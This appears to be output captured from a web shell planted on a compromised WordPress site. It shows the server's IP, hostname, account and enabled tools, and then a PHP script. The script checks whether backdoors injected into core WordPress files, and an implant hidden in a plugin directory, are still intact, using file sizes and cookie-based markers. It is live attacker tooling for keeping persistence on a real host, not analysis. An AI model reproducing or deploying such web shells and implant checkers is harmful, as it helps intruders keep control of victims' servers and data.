| Server IP : 162.144.4.212 / Your IP : 216.73.216.122 Web Server : Apache System : Linux gator2125.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : cozeellc ( 2980) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home4/cozeellc/public_html/ |
Upload File : |
<?php $r = '/home4/cozeellc/public_html'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php"=>"bd@@983091@@AMRjvk",
"/wp-includes/category-template.php"=>"bd@@5228608@@$_COOKIE[3",
"/wp-includes/class-walker-page-dropdown.php"=>"bd@@6908285@@23",
"/index.php"=>"bd@@5865622@@35",
"/wp-includes/post-formats.php"=>"bd@@5858794@@55",
"/wp-admin/install-helper.php"=>"bd@@2407431@@If-Modified-Since",
"/wp-admin/edit-form-advanced.php"=>"bd@@2444070@@_COOKIE[3]",
"/wp-content/plugins/wp-reset/libs/vendor/google/apiclient-services/src/Google/Service/Drive/Resource/sanyo.php"=>"ui@@4374@@106",
"/wp-includes/category-template.php"=>"ui@@4374@@sanyo.php"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');